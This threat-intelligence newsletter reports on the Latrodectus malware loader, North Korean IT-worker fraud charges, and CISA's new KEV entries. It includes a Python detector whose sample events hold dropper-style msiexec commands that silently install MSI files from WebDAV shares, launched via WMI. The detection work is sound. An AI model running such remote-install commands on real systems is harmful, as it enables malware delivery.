Ankura CTIX FLASH Update - May 21, 2024

Ankura Consulting Group LLC


Latrodectus on the Rise: The New IcedID?

For the past few months, researchers at Elastic Security have observed an uptick in the volume of email phishing campaigns involving Latrodectus malware. First discovered by researchers around the fall of 2023, Latrodectus is a malware loader that shares infrastructure overlap with the IcedID malware family. IcedID has been a very popular malware family since its introduction in 2017 as a banking trojan that also functions as a loader for other malware, including ransomware. Researchers believe Latrodectus is written by the same developers as IcedID based on the malware's functionality and the attributed threat actor groups that have been deploying it. In addition, Latrodectus itself has a command handler that specifically downloads and executes an IcedID payload. Researchers speculate this IcedID command handler could exist as a backup malware deployment in case Latrodectus does not perform as expected. The main function of Latrodectus is to create a foothold on the victim's machine and a connection back to the threat actor's command-and-control (C2) server to facilitate the deployment of additional malware. The Latrodectus malware masquerades as libraries associated with legitimate software and self-deletes running files to evade detection. The most recent version of Latrodectus observed in the recent uptick of phishing campaigns can now enumerate files in the desktop directory and retrieve the entire running process hierarchy from the victim machine. The malware campaign associated with Latrodectus begins with a JavaScript dropper that leverages WMI to install an MSI file via msiexec.exe. The MSI file is remotely hosted on a WebDAV share and deploys the Latrodectus payload on execution. CTIX analysts recommend that organizations become familiar with the IOCs associated with this malware as it has the potential to become more widely used. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
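The infection chain above (JavaScript dropper, WMI, msiexec.exe pulling an MSI from a WebDAV share) gives defenders two process-creation signals to hunt for: msiexec.exe whose parent is the WMI provider host, and an MSI path pointing at a WebDAV UNC or HTTP location. The following is an added example, not code from Ankura or Elastic, that runs that detection logic over constructed Sysmon-style events; the event lines, hostnames and addresses are made up for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (key=value form);
# none of these come from a real incident.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\msiexec.exe ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe '
    'CommandLine="msiexec.exe /i \\\\203.0.113.7@80\\share\\update.msi /qn"',
    'Image=C:\\Windows\\System32\\msiexec.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="msiexec.exe /i C:\\Users\\alice\\Downloads\\7zip.msi"',
    'Image=C:\\Windows\\System32\\wscript.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="wscript.exe C:\\Users\\alice\\Downloads\\invoice.js"',
    'Image=C:\\Windows\\System32\\msiexec.exe ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe '
    'CommandLine="msiexec.exe /i \\\\files.example.net\\DavWWWRoot\\setup.msi /quiet"',
]

# key=value pairs; values may be double-quoted when they contain spaces
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# WebDAV UNC forms (\\host@80\..., \\host@SSL\..., \\host\DavWWWRoot\...)
# or an http(s) URL, ending in an .msi file name
REMOTE_MSI_RE = re.compile(
    r'(\\\\[^\\\s]+@(?:\d+|ssl)\\|\\\\[^\\\s]+\\davwwwroot\\|https?://)\S*\.msi\b',
    re.IGNORECASE,
)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict, stripping quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def suspicious_msiexec(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an msiexec.exe event looks like the dropper chain."""
    reasons: List[str] = []
    if not ev.get("Image", "").lower().endswith("\\msiexec.exe"):
        return reasons
    if REMOTE_MSI_RE.search(ev.get("CommandLine", "")):
        reasons.append("msi_from_webdav_or_http")
    if ev.get("ParentImage", "").lower().endswith("\\wmiprvse.exe"):
        reasons.append("spawned_via_wmi")
    return reasons


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command line, reasons) for every event that trips a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = suspicious_msiexec(ev)
        if reasons:
            hits.append((ev.get("CommandLine", ""), reasons))
    return hits
```

Either signal alone is worth a look; both together on one event closely match the chain described above, while the local 7zip.msi install from Explorer is left alone.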

Threat Actor Activity

US and Ukrainian Individuals Arrested After Assisting North Korean Cyber Scheme

The U.S. Justice Department has charged five (5) individuals, including a U.S. citizen and a Ukrainian man, for their roles in cyber schemes designed to financially support North Korea's nuclear weapons program. The elaborate operation aimed at infiltrating the U.S. job market through fraudulent means was part of North Korea's broader strategy to raise funds for its government and illicit nuclear program. Arrests have been made in Arizona and Poland, with significant prison sentences of up to ninety-seven and a half (97.5) years for the American, Christina Chapman, and sixty-seven and a half (67.5) years for Oleksandr Didenko, the Ukrainian. The individuals were involved in the scheme between October 2020 and October 2023 and have since been charged with conspiracy to defraud the United States, aggravated identity theft, and conspiracy to commit money laundering, wire fraud, identity fraud, and bank fraud. The scheme involved the use of "laptop farms" to disguise the location of North Korean IT workers, enabling them to secure remote employment with several Fortune 500 companies across various industries, including an aerospace and defense company, a prominent television network, a "Silicon Valley" tech company, and other high-profile companies. The DOJ has also said that "Didenko is alleged to have managed as many as approximately 871 proxy identities, provided proxy accounts for three (3) freelance IT hiring platforms, and provided proxy accounts for three (3) different money service transmitters." This fraudulent activity not only compromised the identities of over sixty (60) U.S. citizens but also impacted more than three hundred (300) U.S. companies, generating at least $6.8 million in revenue for North Korea while creating false tax liabilities for dozens of Americans. 
In response to these revelations, the FBI has released an advisory to help companies identify and protect against similar North Korean-related threats, emphasizing the ongoing challenge of safeguarding national security against foreign cyber espionage and fraud.

Vulnerabilities

CISA Adds Google Chrome and Unsupported D-Link Router Vulnerabilities to KEV

The U.S. Cybersecurity & Infrastructure Security Agency (CISA) recently updated its Known Exploited Vulnerabilities (KEV) catalog to include three (3) security flaws: one (1) affecting Google Chrome and two (2) targeting D-Link routers. The Google Chrome vulnerability, tracked as CVE-2024-4761, involves an out-of-bounds write in the V8 JavaScript engine and is rated as highly severe, with confirmed active exploitation as of May 13, 2024. Although another related Chrome vulnerability has been exploited, it hasn't yet been added to CISA's catalog. For D-Link, the highlighted vulnerabilities include a ten-year-old cross-site request forgery (CSRF) vulnerability in DIR-600 routers (CVE-2014-100005) and another bug in DIR-605 routers (CVE-2021-40655); both models are no longer supported by D-Link. These vulnerabilities allow attackers to hijack administrative controls or steal credentials. With their addition to the KEV, CISA mandates that all Federal Civilian Executive Branch (FCEB) agencies patch or mitigate all affected devices no later than June 6, 2024, emphasizing the ongoing threat from older, unpatched vulnerabilities often exploited by botnet malware.
